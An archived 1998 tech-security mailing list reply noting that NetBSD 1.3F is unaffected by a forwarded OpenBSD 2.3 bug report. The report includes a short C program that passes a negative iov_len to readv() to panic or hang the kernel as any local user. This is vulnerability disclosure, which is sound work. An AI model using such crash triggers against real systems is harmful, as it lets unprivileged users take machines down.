tech-security: Re: Fwd: Any user can panic OpenBSD machine

Subject: Re: Fwd: Any user can panic OpenBSD machine
To: Michael Fuhr <mfuhr@dimensional.com>
From: Jason Thorpe <thorpej@nas.nasa.gov>
List: tech-security
Date: 07/27/1998 11:21:46

On Mon, 27 Jul 1998 11:23:59 -0600 
 Michael Fuhr <mfuhr@DIMENSIONAL.COM> wrote:

To see if this is a generic *BSD bug, I checked a NetBSD-current (1.3F)
machine.  NetBSD 1.3F is NOT vulnerable; the readv() returns EINVAL.

I performed the NetBSD test on both a PPro (i386) and Shark (arm32).

 > -----Forwarded message from jon@oaktree.co.uk-----
 > 
 > Message-Id: <199807271126.MAA16724@chalk.oaktree.net.uk>
 > Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
 > From: jon@oaktree.co.uk
 > To: gnats@openbsd.org
 > X-Send-Pr-Version: 3.97
 > Subject: kernel/549: Any user can panic OpenBSD machine
 > Sender: owner-bugs@openbsd.org
 > 
 > 
 > >Number:         549
 > >Category:       kernel
 > >Synopsis:       readv with -ve block size panics kernel
 > >Confidential:   yes
 > >Severity:       critical
 > >Priority:       high
 > >Responsible:    bugs
 > >State:          open
 > >Class:          sw-bug
 > >Submitter-Id:   net
 > >Arrival-Date:   Mon Jul 27 05:40:02 MDT 1998
 > >Last-Modified:
 > >Originator:     Jon Ribbens
 > >Organization:
 > \/ Jon Ribbens / jon@oaktree.co.uk
 > >Release:        2.3
 > >Environment:
 > 
 >         System      : OpenBSD 2.3
 >         Architecture: OpenBSD.i386
 >         Machine     : i386
 > >Description:
 >         readv with one of the blocks having a -ve size panics the kernel.
 >         Oops.
 > 
 > >How-To-Repeat:
 > 
 > #include <sys/types.h>
 > #include <sys/uio.h>
 > #include <unistd.h>
 > 
 > int main(void) {
 >   struct iovec iov[1];
 >   char buffer[1024];
 > 
 >   iov[0].iov_base = buffer;
 >   iov[0].iov_len = -1;
 > 
 >   return readv(0, iov, 1);
 > }
 > 
 >         run the above program, type a few characters, press return, observe
 >         either kernel panic or machine hang. panic message is
 >         "panic: ureadc: non-positive resid". Any user can do this.
 > 
 > 
 > >Fix:
 >         Dunno I'm afraid.
 > 
 > 
 > >Audit-Trail:
 > >Unformatted:
 > 
 > -----End of forwarded message-----
 > 
 > --
 > Michael Fuhr
 > http://www.fuhr.net/~mfuhr/

Jason R. Thorpe                                       thorpej@nas.nasa.gov
NASA Ames Research Center                            Home: +1 408 866 1912
NAS: M/S 258-5                                       Work: +1 650 604 0935
Moffett Field, CA 94035                             Pager: +1 650 940 5942